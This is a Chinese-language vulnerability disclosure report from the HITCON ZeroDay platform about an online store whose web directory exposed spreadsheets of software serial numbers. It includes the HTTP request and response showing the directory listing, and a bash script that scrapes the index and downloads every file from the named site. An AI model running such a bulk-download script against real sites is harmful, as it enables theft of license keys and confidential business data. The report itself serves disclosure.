Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2016-00064
- Vendor: 泰騰恩
- Title: 泰騰恩 網路商城洩漏軟體序號
- Introduction: 機敏的業務資料不應該擺在網站目錄底下嘿
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2016/04/22 15:48:21 : 新提交 (由 [email protected] 更新此狀態)
- 2016/04/27 02:41:25 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/04/27 02:47:49 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/05/09 02:42:06 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/06/24 01:01:41 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)
詳細資料
- ZDID:ZD-2016-00064
- 通報者:chris ([email protected])
- 風險:高
- 類型:資訊洩漏 (Information Leakage)
參考資料
OWASP 漏洞說明 (Top 10 2017 - A3 Sensitive Data Exposure)
https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure
CWE-200 漏洞說明
https://cwe.mitre.org/data/definitions/200.html
相關網址
敘述
漏洞位置: 無
備註說明:
原為中、低等級弱點,但測試人員發現外洩的軟體序號可成功被使用故調高風險等級
網頁請求:
GET /_files/sndb/ HTTP/1.1
Host: store.tech-titan.com.tw
Connection: close
網頁回應:
HTTP/1.1 200 OK
Date: Fri, 22 Apr 2016 07:32:40 GMT
Server: Apache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 70799
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /_files/sndb</title>
</head>
<body>
<h1>Index of /_files/sndb</h1>
<ul>
<li>
<a href="/_files/">Parent Directory</a>
</li>
< .. 上略>
<li>
<a href="%bc%c6%a6%ec%aa%a9-Acronis%20True%20Image%202016%20for%20PC-1PC_100%ad%d3.xls">-Acronis True Image 2016 for PC-1PC_100個.xls</a>
</li>
<li>
<a href="%bc%c6%a6%ec%aa%a9-Acronis%20True%20Image%202016%20for%20PC-3PC_50%ad%d3.xls">-Acronis True Image 2016 for PC-3PC_50個.xls</a>
</li>
<li>
<a href="%bc%c6%a6%ec%aa%a9-Acronis%20True%20Image%202016%20for%20PC-5PC_20%ad%d3.xls">-Acronis True Image 2016 for PC-5PC_20個.xls</a>
</li>
<li>
<a href="%bc%c6%a6%ec%aa%a9-Acronis-ATI%20Cloud%202016%20for%201P+3Mobile_10%ad%d3.xls">-Acronis-ATI Cloud 2016 for 1P+3Mobile_10個.xls</a>
</li>
<li>
<a href="%bc%c6%a6%ec%aa%a9-Acronis-ATI%20Cloud%202016%20for%203P+10Mobile_10%ad%d3.xls">-Acronis-ATI Cloud 2016 for 3P+10Mobile_10個.xls</a>
</li>
<li>
<a href="%bc%c6%a6%ec%aa%a9-Acronis-ATI%20Cloud%202016%20for%205P+15Mobile_5%ad%d3.xls">-Acronis-ATI Cloud 2016 for 5P+15Mobile_5個.xls</a>
< .. 下略>
測試語法:
!/bin/bash
curl https://store.tech-titan.com.tw/_files/sndb/ | iconv -f "BIG5" -t "UTF-8" | \
grep "<a href" | sed -r 's#^.<a href="([^"]+)"> ([^<]+)</a>.$#\1\t\2#' > /tmp/files.txt
OLDIFS=$IFS
IFS=$'\t'
while read url name
do
wget https://store.tech-titan.com.tw/_files/sndb/$url -O $name
done < /tmp/files.txt
IFS=$OLDIFS